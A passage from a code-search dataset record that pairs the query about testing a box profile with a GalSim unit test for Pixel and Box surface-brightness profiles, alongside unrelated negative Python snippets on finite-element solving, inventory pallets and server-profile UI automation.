sum(integrals_R_L)\n\n # Simpler variational formulation\n F = kappa*dot(grad(u), grad(v))*dx + \\\n sum(integrals_R) - f*v*dx + sum(integrals_N)\n a, L = lhs(F), rhs(F)\n\n # Compute solution\n u = Function(V)\n\n if linear_solver == 'Krylov':\n prm = parameters['krylov_solver'] # short form\n prm['absolute_tolerance'] = abs_tol\n prm['relative_tolerance'] = rel_tol\n prm['maximum_iterations'] = max_iter\n print(parameters['linear_algebra_backend'])\n set_log_level(log_level)\n if dump_parameters:\n info(parameters, True)\n solver_parameters = {'linear_solver': 'gmres',\n 'preconditioner': 'ilu'}\n else:\n solver_parameters = {'linear_solver': 'lu'}\n\n solve(a == L, u, bcs, solver_parameters=solver_parameters)\n return u, kappa # Note: kappa may be modified (Function on V0)", "def construct_inv_boundaries(params,par_dict,eq_dict,K_RC,K_CP,m_P):\n #intrapop params\n q1=par_dict['q1']\n q2=par_dict['q2']\n K =par_dict['K']\n m_C= K_CP*m_P\n q10 = params['q10']\n q20 = params['q20']\n hC0 = params['hC0']\n hP0 = params['hP0']\n\n #interpop params\n a1=par_dict['a1']\n a2=par_dict['a2']\n a3=par_dict['a3']\n e1=params['e1']\n e2=params['e2']\n e3=params['e3']\n \n\n t_hc = par_dict['t_hc']\n t_hp = par_dict['t_hp']\n\n #eq values\n\n #L-V\n R_eq_s2 = eq_dict['R_eq_s2']\n C_eq_s2 = eq_dict['C_eq_s2']\n P_eq_s3 = eq_dict['P_eq_s3']\n R_eq_s3 = eq_dict['R_eq_s3']\n #R-M\n R_eq_s2RM = eq_dict['R_eq_s2RM']\n C_eq_s2RM = eq_dict['C_eq_s2RM']\n R_eq_s3RM = eq_dict['R_eq_s3RM']\n P_eq_s3RM = eq_dict['P_eq_s3RM']\n \n ##Invasibility boundaries\n\n #L-V\n I_C_s2 = set_I_C_s2(e1,a1,K,q1)\n I_P_s3 = set_I_P_s3(e2,a2,K,q2)\n I_P_s4 = set_I_P_s4(e2,e3,a2,a3,q2,R_eq_s2,C_eq_s2)\n I_C_s5 = set_I_C_s5(e1,a1,a3,R_eq_s3,P_eq_s3,q1)\n \n #R-M\n I_C_s2RM = set_I_C_s2RM(e1,a1,K,q1,hC0,q10)\n I_P_s3RM = set_I_P_s3RM(e2,a2,K,q2,hP0,q20)\n I_P_s4RM = set_I_P_s4RM(e2,e3,a2,a3,q2,R_eq_s2RM,C_eq_s2RM,hP0,q20)\n I_C_s5RM = set_I_C_s5RM(e1,e2,a1,a3,m_C,R_eq_s3RM,P_eq_s3RM,q1,t_hc,q10,q20,hP0,hC0) \n\n inv_dict= {'I_C_s2':I_C_s2,'I_P_s3':I_P_s3,'I_P_s4':I_P_s4,'I_C_s5':I_C_s5,\n 'I_C_s2RM':I_C_s2RM,'I_P_s3RM':I_P_s3RM,'I_P_s4RM':I_P_s4RM,'I_C_s5RM':I_C_s5RM}\n\n return inv_dict" ]
[ "0.6390884", "0.633568", "0.63244265", "0.6194868", "0.6181194", "0.6133254", "0.5930542", "0.58581144", "0.58474624", "0.58428305", "0.5813989", "0.5792263", "0.57295126", "0.57068944", "0.5669466", "0.5665661", "0.5663369", "0.56552625", "0.56534404", "0.56359583", "0.5629656", "0.5625885", "0.5621039", "0.56177205", "0.5613318", "0.56057847", "0.5581545", "0.55674595", "0.5565062", "0.55598754", "0.55513936", "0.5535068", "0.5520251", "0.5491375", "0.5484487", "0.5476811", "0.5474016", "0.5473386", "0.54710454", "0.5448324", "0.5431971", "0.54275113", "0.5423188", "0.5421202", "0.54175735", "0.54098344", "0.54057854", "0.54014724", "0.5398196", "0.5357134", "0.5357134", "0.53329104", "0.53308696", "0.53308696", "0.5330452", "0.53256893", "0.5318197", "0.53139657", "0.53101456", "0.5284062", "0.52738905", "0.5273163", "0.5270081", "0.52601796", "0.5259099", "0.52575207", "0.52550286", "0.5244608", "0.52388895", "0.5235186", "0.5233778", "0.5231", "0.52256685", "0.521741", "0.5216009", "0.5207838", "0.52074885", "0.5203855", "0.5196744", "0.5196204", "0.51950413", "0.51946574", "0.5193127", "0.51912785", "0.518946", "0.51888084", "0.5187227", "0.5186817", "0.51839256", "0.51811516", "0.5179807", "0.5177502", "0.51755744", "0.5165309", "0.51623386", "0.5152163", "0.51498634", "0.5146199", "0.51459", "0.5145887", "0.51394874" ]
0.0
-1
Test the generation of a specific box profile against a known result.
def test_box(): savedImg = galsim.fits.read(os.path.join(imgdir, "box_1.fits")) myImg = galsim.ImageF(savedImg.bounds, scale=0.2) myImg.setCenter(0,0) test_flux = 1.8 pixel = galsim.Pixel(scale=1, flux=1) pixel.drawImage(myImg, method="sb", use_true_center=False) np.testing.assert_array_almost_equal( myImg.array, savedImg.array, 5, err_msg="Using GSObject Pixel disagrees with expected result") np.testing.assert_array_equal( pixel.scale, 1, err_msg="Pixel scale returned wrong value") # Check with default_params pixel = galsim.Pixel(scale=1, flux=1, gsparams=default_params) pixel.drawImage(myImg, method="sb", use_true_center=False) np.testing.assert_array_almost_equal( myImg.array, savedImg.array, 5, err_msg="Using GSObject Pixel with default_params disagrees with expected result") pixel = galsim.Pixel(scale=1, flux=1, gsparams=galsim.GSParams()) pixel.drawImage(myImg, method="sb", use_true_center=False) np.testing.assert_array_almost_equal( myImg.array, savedImg.array, 5, err_msg="Using GSObject Pixel with GSParams() disagrees with expected result") # Use non-unity values. pixel = galsim.Pixel(flux=1.7, scale=2.3) gsp = galsim.GSParams(xvalue_accuracy=1.e-8, kvalue_accuracy=1.e-8) pixel2 = galsim.Pixel(flux=1.7, scale=2.3, gsparams=gsp) assert pixel2 != pixel assert pixel2 == pixel.withGSParams(xvalue_accuracy=1.e-8, kvalue_accuracy=1.e-8) # Test photon shooting. do_shoot(pixel,myImg,"Pixel") # Check picklability do_pickle(pixel, lambda x: x.drawImage(method='no_pixel')) do_pickle(pixel) do_pickle(galsim.Pixel(1)) # Check that non-square Box profiles work correctly scale = 0.2939 # Use a strange scale here to make sure that the centers of the pixels # never fall on the box edge, otherwise it gets a bit weird to know what # the correct SB value is for that pixel. im = galsim.ImageF(16,16, scale=scale) gsp = galsim.GSParams(maximum_fft_size = 30000) for (width,height) in [ (3,2), (1.7, 2.7), (2.2222, 3.1415) ]: box = galsim.Box(width=width, height=height, flux=test_flux, gsparams=gsp) check_basic(box, "Box with width,height = %f,%f"%(width,height)) do_shoot(box,im,"Box with width,height = %f,%f"%(width,height)) if __name__ == '__main__': # These are slow because they require a pretty huge fft. # So only do them if running as main. do_kvalue(box,im,"Box with width,height = %f,%f"%(width,height)) cen = galsim.PositionD(0, 0) np.testing.assert_equal(box.centroid, cen) np.testing.assert_almost_equal(box.kValue(cen), (1+0j) * test_flux) np.testing.assert_almost_equal(box.flux, test_flux) np.testing.assert_almost_equal(box.xValue(cen), box.max_sb) np.testing.assert_almost_equal(box.xValue(width/2.-0.001, height/2.-0.001), box.max_sb) np.testing.assert_almost_equal(box.xValue(width/2.-0.001, height/2.+0.001), 0.) np.testing.assert_almost_equal(box.xValue(width/2.+0.001, height/2.-0.001), 0.) np.testing.assert_almost_equal(box.xValue(width/2.+0.001, height/2.+0.001), 0.) 
np.testing.assert_array_equal( box.width, width, err_msg="Box width returned wrong value") np.testing.assert_array_equal( box.height, height, err_msg="Box height returned wrong value") gsp2 = galsim.GSParams(xvalue_accuracy=1.e-8, kvalue_accuracy=1.e-8) box2 = galsim.Box(width=width, height=height, flux=test_flux, gsparams=gsp2) assert box2 != box assert box2 == box.withGSParams(gsp2) assert box2 != box.withGSParams(xvalue_accuracy=1.e-8, kvalue_accuracy=1.e-8) assert box2.withGSParams(maximum_fft_size=30000) == box.withGSParams(xvalue_accuracy=1.e-8, kvalue_accuracy=1.e-8) # Check picklability do_pickle(box, lambda x: x.drawImage(method='no_pixel')) do_pickle(box) do_pickle(galsim.Box(1,1)) # Check sheared boxes the same way box = galsim.Box(width=3, height=2, flux=test_flux, gsparams=gsp) box = box.shear(galsim.Shear(g1=0.2, g2=-0.3)) check_basic(box, "Sheared Box", approx_maxsb=True) do_shoot(box,im, "Sheared Box") if __name__ == '__main__': do_kvalue(box,im, "Sheared Box") do_pickle(box, lambda x: x.drawImage(method='no_pixel')) do_pickle(box) cen = galsim.PositionD(0, 0) np.testing.assert_equal(box.centroid, cen) np.testing.assert_almost_equal(box.kValue(cen), (1+0j) * test_flux) np.testing.assert_almost_equal(box.flux, test_flux) np.testing.assert_almost_equal(box.xValue(cen), box.max_sb) # This is also a profile that may be convolved using real space convolution, so test that. if __name__ == '__main__': conv = galsim.Convolve(box, galsim.Pixel(scale=scale), real_space=True) check_basic(conv, "Sheared Box convolved with pixel in real space", approx_maxsb=True, scale=0.2) do_kvalue(conv,im, "Sheared Box convolved with pixel in real space") do_pickle(conv, lambda x: x.xValue(0.123,-0.456)) do_pickle(conv)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_get_game_boxscore(self):\n pass", "def testProfileCreation(self):\n small_tree1_equality = self.checkProfileEquality(self.profiles[0], self.small_profile1)\n small_tree2_equality = self.checkProfileEquality(self.profiles[1], self.small_profile2)\n known_tree1_equality = self.checkProfileEquality(self.profiles[2], self.known_profile1)\n known_tree2_equality = self.checkProfileEquality(self.profiles[3], self.known_profile2)\n \n self.assertEqual(small_tree1_equality, True)\n self.assertEqual(small_tree2_equality, True)\n self.assertEqual(known_tree1_equality, True)\n self.assertEqual(known_tree2_equality, True)", "def testProfileCreation(self):\r\n small_tree1_equality = self.checkProfileEquality(self.profiles[0], self.small_profile1)\r\n small_tree2_equality = self.checkProfileEquality(self.profiles[1], self.small_profile2)\r\n known_tree1_equality = self.checkProfileEquality(self.profiles[2], self.known_profile1)\r\n known_tree2_equality = self.checkProfileEquality(self.profiles[3], self.known_profile2)\r\n\r\n self.assertEqual(small_tree1_equality, True)\r\n self.assertEqual(small_tree2_equality, True)\r\n self.assertEqual(known_tree1_equality, True)\r\n self.assertEqual(known_tree2_equality, True)", "def test_boxscore_scores(self):\n test_hteam_totals = self.BS.hTeam_totals['points']\n answer_hteam_totals = '140'\n test_vteam_totals = self.BS.vTeam_totals['points']\n answer_vteam_totals = '111'\n\n self.assertEqual(test_hteam_totals, answer_hteam_totals)\n self.assertEqual(test_vteam_totals, answer_vteam_totals)", "def test():\n suite = unittest.TestLoader().loadTestsFromTestCase(TestIBox)\n runtime = unittest.TextTestRunner(verbosity=2).run(suite)\n return runtime.wasSuccessful()", "def bak_verify_server_profile_general_info(*profile_obj):\n selenium2lib = ui_lib.get_s2l()\n\n if not selenium2lib._is_element_present(FusionServerProfilesPage.ID_PAGE_LABEL):\n navigate()\n\n for profile in profile_obj:\n server = profile.server\n hardwaretype = profile.hardwareType\n enclosuregroup = profile.enclgroup\n\n ui_lib.wait_for_element_and_click(FusionServerProfilesPage.ID_ELEMENT_PROFILE_NAME_BASE % profile.name)\n ui_lib.wait_for_element_and_click(FusionServerProfilesPage.ID_ELEMENT_PROFILE_NAME_BASE % profile.name)\n BuiltIn().sleep(5) # wait for fields to load\n\n logger.info(\"Verifying server hardware for profile %s\" % profile.name)\n if ui_lib.wait_for_element_text(FusionServerProfilesPage.ID_PROFILE_SERVER, server, PerfConstants.DEFAULT_SYNC_TIME) is False:\n txt = ui_lib.get_text(FusionServerProfilesPage.ID_PROFILE_SERVER)\n logger.info(\"Server hardware of server : %s is not as expected [%s]\" % (txt, server))\n selenium2lib.capture_page_screenshot()\n return False\n\n logger.info(\"Verifying server hardware type for profile %s\" % profile.name)\n if ui_lib.wait_for_element_visible(FusionServerProfilesPage.ID_PROFILE_HARDWARE, PerfConstants.DEFAULT_SYNC_TIME, fail_if_false=False) is True:\n txt = ui_lib.get_text(FusionServerProfilesPage.ID_PROFILE_HARDWARE)\n if txt.find(hardwaretype) == -1:\n logger.info(\"Server hardware of server : %s is not as expected [%s]\" % (txt, hardwaretype))\n selenium2lib.capture_page_screenshot()\n return False\n else:\n logger.warn(\"Failed to wait server hardware type field display\")\n return False\n\n logger.info(\"Verifying enclosure group for profile %s\" % profile.name)\n if ui_lib.wait_for_element_text(FusionServerProfilesPage.ID_PROFILE_ENCLOSUREGROUP, enclosuregroup, PerfConstants.DEFAULT_SYNC_TIME) is False:\n txt = 
ui_lib.get_text(FusionServerProfilesPage.ID_PROFILE_ENCLOSUREGROUP)\n logger.info(\"Enclosure group of server : %s is not as expected [%s]\" % (txt, enclosuregroup))\n selenium2lib.capture_page_screenshot()\n return False\n\n return True", "def test_add_spawning_profile_to_intersection():\n tester = TestClass()\n intersections = tester.add_spawning_profile_to_intersection()\n\n attached = False\n\n for i in intersections:\n for spawn in i.get_spawning_profile_list():\n if spawn.get_spawning_profile_name() == 'Default':\n attached = True\n break;\n\n assert attached", "def test_get(self):\r\n profile = self.profile_manager.get('testing')\r\n self.assertIsInstance(profile, Profile)", "def run_tests(): \n \n\n nextdata = [[21, 61, 42, 30], [33,45, 18, 29]]\n\n for xval, yval, snum, expect in nextdata:\n\n pmachine = PMachine()\n pmachine.serial_number = snum\n pmachine.run2_completion()\n result = pmachine.calc_square_total(xval, yval, showsquare=True)\n assert result == expect\n print(\"Got value {}={} as expected\".format(result, expect))", "def test_imdb(net, imdb, anchors):\n output_dir = get_output_dir(imdb, net)\n cache_file = os.path.join(output_dir, 'res_boxes.pkl')\n \n # load cache result boxes (filtered)\n if os.path.exists(cache_file):\n with open(cache_file, 'rb') as f:\n proposal_boxes = cPickle.load(f)\n print 'load res boxes from \\'{}\\''.format(cache_file)\n return proposal_boxes\n \n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n \n print 'Generating proposal boxes by rpn model...'\n proposal_boxes = test_net(net, imdb, anchors)\n print 'Get proposal boxes done!'\n \n print 'Current NMS configuration:'\n print NMS_CONFIG\n\n expand_val = lambda boxes: np.array([boxes[:,0] - boxes[:,2], boxes[:,1] - boxes[:,3],\n boxes[:,2] - boxes[:,0], boxes[:,3] - boxes[:,1],\n np.zeros(boxes.shape[0])]).T * EXPAND_RATIO \n \n # filter boxes\n print 'Filtering proposal boxes...'\n for i in xrange(len(proposal_boxes)):\n proposal_boxes[i] = boxes_filter(proposal_boxes[i], \n PRE_NMS_TOPN=NMS_CONFIG['PRE_NMS_TOPN'], \n NMS_THRESH=NMS_CONFIG['NMS_THRESH'], \n POST_NMS_TOPN=NMS_CONFIG['POST_NMS_TOPN'],\n CONF_THRESH=CONF_THRESH,\n USE_GPU=NMS_CONFIG['USE_GPU'])\n\n # expand bounding box\n if len(proposal_boxes[i]) > 0:\n proposal_boxes[i] = proposal_boxes[i] + expand_val(proposal_boxes[i])\n print 'filter proposal box: {:d}/{:d}'.format(i+1, len(proposal_boxes))\n print 'Filter proposal boxes done!'\n \n # save file\n with open(cache_file, 'wb') as f:\n cPickle.dump(proposal_boxes, f, cPickle.HIGHEST_PROTOCOL)\n print 'save result boxes to `{:s}`'.format(cache_file)\n \n return proposal_boxes", "def test_pallet_finish(self) -> None:\n # set some arbitrary values\n pallet_name = 'Hopefully this never matches !@#$%^&*()_+'\n location_code = '0409C2'\n box_type_code = 'Evans'\n starting_box_number = 98765\n number_of_boxes = 40\n ending_box_number = starting_box_number + number_of_boxes\n product_choices = 'Corn', 'Green Beans'\n exp_year_choices = (now().year + 1), (now().year + 2)\n\n # get corresponding records\n box_type_rec = BoxType.objects.get(box_type_code=box_type_code)\n product1 = Product.objects.get(prod_name=product_choices[0])\n product2 = Product.objects.get(prod_name=product_choices[1])\n product_rec_choices = product1, product2\n\n bm = BoxManagementClass()\n\n # build the pallet\n location_rec = Location.objects.get(loc_code=location_code)\n pallet_rec = Pallet.objects.create(\n name=pallet_name,\n location=location_rec,\n pallet_status=Pallet.FILL,\n )\n 
pallet_rec_id = pallet_rec.id\n\n # build table of values for later comparison\n pallet_box_info = dict()\n for ndx, box_number in enumerate(\n range(starting_box_number, ending_box_number)):\n ind = ndx % 2\n box_name = BoxNumber.format_box_number(box_number)\n product = product_rec_choices[ind]\n exp_year = exp_year_choices[ind]\n box_rec = bm.box_new(box_number=box_name, box_type=box_type_rec)\n pallet_box_rec = PalletBox.objects.create(\n pallet=pallet_rec,\n box_number=box_name,\n box=box_rec,\n product=product,\n exp_year=exp_year,\n box_status=PalletBox.NEW\n )\n pallet_box_info[box_number] = PalletBoxInfo(\n pallet_box_id=pallet_box_rec.id, box_id=box_rec.id,\n box_number=box_name, product=product, exp_year=exp_year)\n\n # finish (publish) the pallet\n bm.pallet_finish(pallet_rec)\n\n # validate that worked properly\n for entry in pallet_box_info:\n with raises(PalletBox.DoesNotExist):\n _ = PalletBox.objects.get(\n pk=pallet_box_info[entry].pallet_box_id\n )\n box_rec = Box.objects.get(pk=pallet_box_info[entry].box_id)\n assert box_rec.box_number == pallet_box_info[entry].box_number\n assert box_rec.box_type == box_type_rec\n assert box_rec.location == location_rec\n assert box_rec.product == pallet_box_info[entry].product\n assert box_rec.exp_year == pallet_box_info[entry].exp_year\n assert box_rec.exp_month_start == 0\n assert box_rec.exp_month_end == 0\n filled_seconds_ago = (now() - box_rec.date_filled).total_seconds()\n assert filled_seconds_ago < 10\n assert box_rec.quantity == box_type_rec.box_type_qty\n\n with raises(Pallet.DoesNotExist):\n _ = Pallet.objects.get(pk=pallet_rec_id)\n return", "def test_user_profiles(self):\n\n result = self.client.get(\"/profile/1\")\n self.assertIn(b'In house:',result.data)", "def __test_profile(self, bk):\n for arg in self.args['profile']:\n ds = ArgoDataFetcher(backend=bk).profile(*arg).to_xarray()\n assert isinstance(ds, xr.Dataset) == True", "def __call__(self, results):\n\n if 'img_fields' in results:\n assert results['img_fields'] == ['img'], \\\n 'Only single img_fields is allowed'\n img = results['img']\n assert 'bbox_fields' in results\n boxes = [results[key] for key in results['bbox_fields']]\n boxes = np.concatenate(boxes, 0)\n h, w, c = img.shape\n while True:\n mode = random.choice(self.sample_mode)\n self.mode = mode\n if mode == 1:\n return results\n\n min_iou = mode\n for i in range(50):\n new_w = random.uniform(self.min_crop_size * w, w)\n new_h = random.uniform(self.min_crop_size * h, h)\n\n # h / w in [0.5, 2]\n if new_h / new_w < 0.5 or new_h / new_w > 2:\n continue\n\n left = random.uniform(w - new_w)\n top = random.uniform(h - new_h)\n\n patch = np.array(\n (int(left), int(top), int(left + new_w), int(top + new_h)))\n # Line or point crop is not allowed\n if patch[2] == patch[0] or patch[3] == patch[1]:\n continue\n overlaps = bbox_overlaps(\n patch.reshape(-1, 4), boxes.reshape(-1, 4)).reshape(-1)\n if len(overlaps) > 0 and overlaps.min() < min_iou:\n continue\n\n # center of boxes should inside the crop img\n # only adjust boxes and instance masks when the gt is not empty\n if len(overlaps) > 0:\n # adjust boxes\n def is_center_of_bboxes_in_patch(boxes, patch):\n center = (boxes[:, :2] + boxes[:, 2:]) / 2\n mask = ((center[:, 0] > patch[0]) *\n (center[:, 1] > patch[1]) *\n (center[:, 0] < patch[2]) *\n (center[:, 1] < patch[3]))\n return mask\n\n mask = is_center_of_bboxes_in_patch(boxes, patch)\n if not mask.any():\n continue\n for key in results.get('bbox_fields', []):\n boxes = results[key].copy()\n mask = 
is_center_of_bboxes_in_patch(boxes, patch)\n boxes = boxes[mask]\n if self.bbox_clip_border:\n boxes[:, 2:] = boxes[:, 2:].clip(max=patch[2:])\n boxes[:, :2] = boxes[:, :2].clip(min=patch[:2])\n boxes -= np.tile(patch[:2], 2)\n\n results[key] = boxes\n # labels\n label_key = self.bbox2label.get(key)\n if label_key in results:\n results[label_key] = results[label_key][mask]\n\n # mask fields\n mask_key = self.bbox2mask.get(key)\n if mask_key in results:\n results[mask_key] = results[mask_key][\n mask.nonzero()[0]].crop(patch)\n # adjust the img no matter whether the gt is empty before crop\n img = img[patch[1]:patch[3], patch[0]:patch[2]]\n results['img'] = img\n results['img_shape'] = img.shape\n\n # seg fields\n for key in results.get('seg_fields', []):\n results[key] = results[key][patch[1]:patch[3],\n patch[0]:patch[2]]\n return results", "def test_remove_spawning_profile_from_intersection():\n tester = TestClass()\n intersections = tester.add_spawning_profile_to_intersection()\n\n for i in intersections:\n if len(i.get_spawning_profile_list()) != 0:\n assert True\n\n for spawn in i.get_spawning_profile_list():\n if spawn.get_spawning_profile_name() == 'Default':\n assert True\n break\n\n tester.delete_spawning_profile_from_intersection()\n\n for i in intersections:\n if len(i.get_spawning_profile_list()) == 0:\n assert True", "def check_pm_elements(*profile_obj):\n profile_elements = ProfileContainer(ProfileContainerType.ADD)\n testResult = True\n logger._log_to_console_and_log_file(\"########### Start a simple check to find all elements.###########\")\n\n selenium2lib = ui_lib.get_s2l()\n if not selenium2lib._is_element_present(FusionServerProfilesPage.ID_PAGE_LABEL):\n navigate()\n\n if isinstance(profile_obj, test_data.DataObj):\n profile_obj = [profile_obj]\n elif isinstance(profile_obj, tuple):\n profile_obj = list(profile_obj[0])\n\n \"\"\" Using checkElementsUItbirdPM to verify if the elements were displayed, if not, mark failure as true \"\"\"\n for profile in profile_obj:\n \"\"\" General profile manager \"\"\"\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_LINK_CREATE_SERVER_PROFILES, \" --> ServerProfiles link from Menu \")\n testResult &= correctly_executed(ui_lib.wait_for_element_visible, FusionServerProfilesPage.ID_INPUT_SERVER_PROFILE_NAME, \" --> Field Name\")\n testResult &= correctly_executed(ui_lib.wait_for_element_visible, FusionServerProfilesPage.ID_INPUT_SERVER_PROFILE_DESCRIPTION, \" --> Field description\")\n\n \"\"\" Select hardware \"\"\"\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_COMBO_SERVER_HARDWARE_DROPDOWN, \" --> Server Hardware Dropdown \")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_ELEMENT_NETWORK_NAME_BASE % profile.server, \" --> '\" + profile.server + \"' option in 'Server hardware' dropdown\")\n\n \"\"\" Select server hardware type \"\"\"\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_COMBO_SERVER_HARDWARE_TYPE_DROPDOWN, \" --> Server Hardware Type Dropdown \")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_ELEMENT_NETWORK_NAME_BASE % profile.hardwaretype, \" --> '\" + profile.hardwaretype + \"' option in 'Server hardware type' dropdown\")\n\n \"\"\" Verify Enclosure Group \"\"\"\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, 
FusionServerProfilesPage.ID_COMBO_ENCLOSURE_GROUP_DROPDOWN, \" --> Enclosure Group Dropdown \")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_ELEMENT_NETWORK_NAME_BASE % profile.enclgroup, \" --> Select combo enclosure group dropdown: '\" + profile.enclgroup + \"'\")\n\n \"\"\" Selecting the Affinity \"\"\"\n logger._log_to_console_and_log_file(\"########### Selected valid affinity..###########\")\n for item in FusionServerProfilesPage.LIST_NAME_AFFINITY:\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_AFFINITY_DROP_DOWN, \" --> Affinity combobox \")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_COMBO_AFFINITY_ITEM % item, \" --> '\" + item + \"' option in 'Affinity' dropdown\")\n\n \"\"\" Firmware Baseline \"\"\"\n testResult &= ui_lib.wait_for_element_and_click(profile_elements.ID_COMBO_MENU_VIEW)\n testResult &= ui_lib.wait_for_element_and_click(FusionServerProfilesPage.ID_LINK_FIRMWARE)\n logger._log_to_console_and_log_file(\"########### Accessing to firmware baseline..###########\")\n\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_FIRMWARE_BASELINE_DROP_DOWN, \" --> Accessing to firmware baseline \")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_LINK_FIRMWARE_BASELINE_ADD, \" --> Clicking on 'ADD Firmware Baseline' link\")\n testResult &= correctly_executed(ui_lib.wait_for_element_visible, FusionServerProfilesPage.ID_BTN_FIRMWARE_BASELINE_YES_PROCEED, \" --> Looking for 'Yes, proceed' button\")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_BTN_FIRMWARE_BASELINE_CANCEL, \" --> Click on 'Cancel' button\")\n\n \"\"\" Add Connections \"\"\"\n logger._log_to_console_and_log_file(\"########### Accessing to add connections..###########\")\n testResult &= ui_lib.wait_for_element_and_click(profile_elements.ID_COMBO_MENU_VIEW)\n testResult &= ui_lib.wait_for_element_and_click(FusionServerProfilesPage.ID_LINK_CONNECTIONS, \" --> Connections Link on Profile Dropdown Menu\")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_BTN_ADD_NETWORK_CONNECTION, \" --> Clicking on 'Add Connection' button\")\n testResult &= correctly_executed(ui_lib.wait_for_element_visible, FusionServerProfilesPage.ID_INPUT_CONNECTION_NAME, \" --> Field Name Connection\")\n\n for item in FusionServerProfilesPage.LIST_NAME_FUNCTIONTYPE:\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_COMBO_CONNECTION_FUNCTION_TYPE, \" --> Function type combobox \")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_SELECT_BOX_GENERIC_ELEMENT % (item, item), \" --> '\" + item + \"' option in 'Function type' dropdown\")\n testResult &= correctly_executed(ui_lib.wait_for_element_visible, FusionServerProfilesPage.ID_INPUT_NETWORK_ADD_CONNECTION, \" --> Field Network\")\n testResult &= correctly_executed(ui_lib.wait_for_element_visible, FusionServerProfilesPage.ID_BTN_ADD_NETWORK_ADD_CONNECTON, \" --> Looking for 'Add' button\")\n testResult &= correctly_executed(ui_lib.wait_for_element_visible, FusionServerProfilesPage.ID_BTN_ADD_NETWORK_ADD_PLUS_CONNECTON, \" --> Looking for 'Add+' button\")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, 
FusionServerProfilesPage.ID_BTN_CANCEL_ADD_CONNECTION, \" --> Clicking on 'Cancel' button\")\n\n \"\"\" Local storage volumes \"\"\"\n testResult &= ui_lib.wait_for_element_and_click(profile_elements.ID_COMBO_MENU_VIEW)\n testResult &= ui_lib.wait_for_element_and_click(FusionServerProfilesPage.ID_LINK_LOCAL_STORAGE)\n logger._log_to_console_and_log_file(\"########### Accessing to Local Storage volumes..###########\")\n selenium2lib.select_checkbox(FusionServerProfilesPage.ID_CHKBOX_LOCAL_STORAGE)\n testResult &= correctly_executed(ui_lib.wait_for_checkbox_and_select, FusionServerProfilesPage.ID_CHKBOX_LOCAL_STORAGE, \" --> Clicking a checbox of Manage Local Storage\")\n testResult &= correctly_executed(ui_lib.wait_for_checkbox_and_select, FusionServerProfilesPage.ID_CHKBOX_MANAGE_INTEGRATED_CONTROLLER, \" --> Clicking a checkbox of manage integrated controller\")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_BTN_MANAGE_STORAGE_CONTROLLER_CLOSE, \" --> Clicking on 'Close' button\")\n testResult &= correctly_executed(ui_lib.wait_for_checkbox_and_unselect, FusionServerProfilesPage.ID_EDIT_INITIALIZE_LOCAL_STORAGE, \" --> Uncheckbox re-initialize internal storage on next application of server profile\")\n testResult &= correctly_executed(ui_lib.wait_for_checkbox_and_select, FusionServerProfilesPage.ID_CHKBOX_IMPORT_EXISTING, \" --> Checkbox import exsisting logical drives\")\n testResult &= correctly_executed(ui_lib.wait_for_checkbox_and_unselect, FusionServerProfilesPage.ID_CHKBOX_IMPORT_EXISTING, \" --> Uncheckbox import exsisting logical drives\")\n testResult &= correctly_executed(ui_lib.wait_for_checkbox_and_select, FusionServerProfilesPage.ID_EDIT_INITIALIZE_LOCAL_STORAGE, \" --> Checkbox re-initialize internal storage on next application of server profile\")\n\n for item in FusionServerProfilesPage.LIST_NAME_CONTROLLER_MODE:\n if __select_value_from_a_profile_combo_box(FusionServerProfilesPage.ID_COMBO_CONTROLLER_MODE, FusionServerProfilesPage.ID_COMBO_DEFAULT_ITEM % item):\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_CHKBOX_CONTROLLER_MODE, \" --> '\" + item + \"' option in 'Controller mode' dropdown\")\n else:\n logger._log_to_console_and_log_file(\" --> Failed to select item %s in controller mode for local storage\" % item)\n testResult &= False\n\n \"\"\" Create Logical Drive \"\"\"\n logger._log_to_console_and_log_file(\"########### Create Logical Drive..###########\")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_BTN_CREATE_LOGICAL_DRIVE, \" --> Select button create logical drive\")\n testResult &= correctly_executed(ui_lib.wait_for_element_visible, FusionServerProfilesPage.ID_NAME_ADD_LOGICAL_DRIVE, \" --> Show a field name in logical drive\")\n for item in FusionServerProfilesPage.LIST_NAME_RAID_LEVEL:\n if __select_value_from_a_profile_combo_box(FusionServerProfilesPage.ID_COMBO_RAID_LEVEL, FusionServerProfilesPage.ID_COMBO_DEFAULT_ITEM_RAID % item):\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_COMBO_ADD_LOGICAL_RAID_LEVEL, \" --> '\" + item + \"' option 'RAID level' dropdown\")\n else:\n logger._log_to_console_and_log_file(\" --> Failed to select item %s in logical drive combobox\" % item)\n testResult &= False\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_LISTBOX_NUMBER_PHYSICAL_DRIVES, \" --> Show a number of physical 
